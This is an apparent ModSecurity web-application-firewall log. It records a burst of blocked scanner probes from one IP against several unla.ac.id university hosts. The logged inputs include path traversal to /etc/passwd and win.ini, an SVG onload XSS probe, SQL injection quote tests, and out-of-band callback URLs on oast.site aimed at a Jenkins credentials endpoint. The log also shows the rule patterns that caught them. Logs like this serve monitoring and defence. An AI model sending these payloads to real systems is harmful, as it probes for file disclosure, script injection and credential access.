[Tue Aug 29 11:36:38.398466 2023] [:error] [pid 1455] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:href. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:href: ../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/_s_/dyn/Log_highlight"] [unique_id "ZO111sCo-f0AAAWvFCEAAAAa"]
[Tue Aug 29 11:36:39.368888 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gx7b9eywa94yjt.oast.site found within TX:1: cjmnbitjmimt14dgn26gx7b9eywa94yjt.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword"] [unique_id "ZO1118Co-f0AAAShCdcAAAAi"]
[Tue Aug 29 11:36:39.375252 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26g7weqm4j9r5i8e.oast.site found within TX:1: cjmnbitjmimt14dgn26g7weqm4j9r5i8e.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword"] [unique_id "ZO1118Co-f0AAASEJgQAAAAE"]
[Tue Aug 29 11:36:39.376411 2023] [:error] [pid 1438] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26g359kbunwcrgnk.oast.site found within TX:1: cjmnbitjmimt14dgn26g359kbunwcrgnk.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword"] [unique_id "ZO1118Co-f0AAAWexkUAAAAP"]
[Tue Aug 29 11:36:39.484139 2023] [:error] [pid 1438] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:href. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:href: ../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/_s_/dyn/Log_highlight"] [unique_id "ZO1118Co-f0AAAWexkkAAAAP"]
[Tue Aug 29 11:36:39.499480 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26g4cbnhouqirye3.oast.site found within TX:1: cjmnbitjmimt14dgn26g4cbnhouqirye3.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword"] [unique_id "ZO1118Co-f0AAAShCdwAAAAi"]
[Tue Aug 29 11:36:39.512184 2023] [:error] [pid 1447] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26ggjsfz9zhgrqjj.oast.site found within TX:1: cjmnbitjmimt14dgn26ggjsfz9zhgrqjj.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword"] [unique_id "ZO1118Co-f0AAAWnjiQAAAAT"]
[Tue Aug 29 11:36:40.522870 2023] [:error] [pid 1457] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gzgfohsy3gi5nn.oast.site found within TX:1: cjmnbitjmimt14dgn26gzgfohsy3gi5nn.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword"] [unique_id "ZO112MCo-f0AAAWx8z8AAAAg"]
[Tue Aug 29 11:36:41.399116 2023] [:error] [pid 889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO112cCo-f0AAAN5YLkAAAAN"]
[Tue Aug 29 11:36:41.399248 2023] [:error] [pid 1461] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO112cCo-f0AAAW1WZwAAAAD"]
[Tue Aug 29 11:36:41.405149 2023] [:error] [pid 1445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO112cCo-f0AAAWlCc8AAAAR"]
[Tue Aug 29 11:36:41.425659 2023] [:error] [pid 1445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO112cCo-f0AAAWlCdAAAAAR"]
[Tue Aug 29 11:36:41.442972 2023] [:error] [pid 1278] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cID: \\x22></iframe><svg/onload=alert(\\x222UdyWLo0lCLqcBCjs5YehILlcGu\\x22)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/ccm/system/panels/page/preview_as_user/preview"] [unique_id "ZO112cCo-f0AAAT@K1gAAAA2"]
[Tue Aug 29 11:36:41.464488 2023] [:error] [pid 1445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cID: \\x22></iframe><svg/onload=alert(\\x222UdyWLo0lCLqcBCjs5YehILlcGu\\x22)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/ccm/system/panels/page/preview_as_user/preview"] [unique_id "ZO112cCo-f0AAAWlCdIAAAAR"]
[Tue Aug 29 11:36:41.473535 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cID: \\x22></iframe><svg/onload=alert(\\x222UdyWLo0lCLqcBCjs5YehILlcGu\\x22)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/ccm/system/panels/page/preview_as_user/preview"] [unique_id "ZO112cCo-f0AAASEJhIAAAAE"]
[Tue Aug 29 11:36:41.476275 2023] [:error] [pid 1465] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cID: \\x22></iframe><svg/onload=alert(\\x222UdyWLo0lCLqcBCjs5YehILlcGu\\x22)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/ccm/system/panels/page/preview_as_user/preview"] [unique_id "ZO112cCo-f0AAAW51SYAAAAF"]
[Tue Aug 29 11:36:41.485575 2023] [:error] [pid 1450] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cID: \\x22></iframe><svg/onload=alert(\\x222UdyWLo0lCLqcBCjs5YehILlcGu\\x22)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ccm/system/panels/page/preview_as_user/preview"] [unique_id "ZO112cCo-f0AAAWquqUAAAAX"]
[Tue Aug 29 11:36:42.357063 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO112sCo-f0AAASEJhQAAAAE"]
[Tue Aug 29 11:36:42.361491 2023] [:error] [pid 1457] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/LetsEncrypt/Index"] [unique_id "ZO112sCo-f0AAAWx80kAAAAg"]
[Tue Aug 29 11:36:42.363352 2023] [:error] [pid 889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/LetsEncrypt/Index"] [unique_id "ZO112sCo-f0AAAN5YL4AAAAN"]
[Tue Aug 29 11:36:42.367304 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/LetsEncrypt/Index"] [unique_id "ZO112sCo-f0AAAQSWR0AAAA0"]
[Tue Aug 29 11:36:42.376460 2023] [:error] [pid 1447] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO112sCo-f0AAAWnjjAAAAAT"]
[Tue Aug 29 11:36:42.383367 2023] [:error] [pid 1445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/LetsEncrypt/Index"] [unique_id "ZO112sCo-f0AAAWlCdYAAAAR"]
[Tue Aug 29 11:36:42.399249 2023] [:error] [pid 1455] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/LetsEncrypt/Index"] [unique_id "ZO112sCo-f0AAAWvFCYAAAAa"]
[Tue Aug 29 11:36:42.403069 2023] [:error] [pid 1465] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cID: \\x22></iframe><svg/onload=alert(\\x222UdyWLo0lCLqcBCjs5YehILlcGu\\x22)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/ccm/system/panels/page/preview_as_user/preview"] [unique_id "ZO112sCo-f0AAAW51SoAAAAF"]
[Tue Aug 29 11:36:43.370492 2023] [:error] [pid 1436] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/LetsEncrypt/Index"] [unique_id "ZO1128Co-f0AAAWcCSoAAAAL"]
[Tue Aug 29 11:36:43.389374 2023] [:error] [pid 889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:idusuario. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:idusuario: '"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/controller/login.php"] [unique_id "ZO1128Co-f0AAAN5YMIAAAAN"]
[Tue Aug 29 11:36:43.406587 2023] [:error] [pid 1444] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:idusuario. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:idusuario: '"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/controller/login.php"] [unique_id "ZO1128Co-f0AAAWkfUcAAAAQ"]
[Tue Aug 29 11:36:43.428706 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:idusuario. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:idusuario: '"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/controller/login.php"] [unique_id "ZO1128Co-f0AAAUbg9wAAABQ"]
[Tue Aug 29 11:36:44.381379 2023] [:error] [pid 1461] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:idusuario. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '' found within ARGS:idusuario: ''"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/controller/login.php"] [unique_id "ZO113MCo-f0AAAW1WakAAAAD"]
[Tue Aug 29 11:36:44.395287 2023] [:error] [pid 1447] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:idusuario. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:idusuario: '"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/controller/login.php"] [unique_id "ZO113MCo-f0AAAWnjjYAAAAT"]
[Tue Aug 29 11:36:44.425158 2023] [:error] [pid 1465] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:idusuario. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:idusuario: '"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/controller/login.php"] [unique_id "ZO113MCo-f0AAAW51TEAAAAF"]
[Tue Aug 29 11:36:44.436907 2023] [:error] [pid 1457] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:idusuario. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '' found within ARGS:idusuario: ''"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/controller/login.php"] [unique_id "ZO113MCo-f0AAAWx81AAAAAg"]
[Tue Aug 29 11:36:44.439945 2023] [:error] [pid 1388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:idusuario. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '' found within ARGS:idusuario: ''"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/controller/login.php"] [unique_id "ZO113MCo-f0AAAVsUdwAAAAb"]
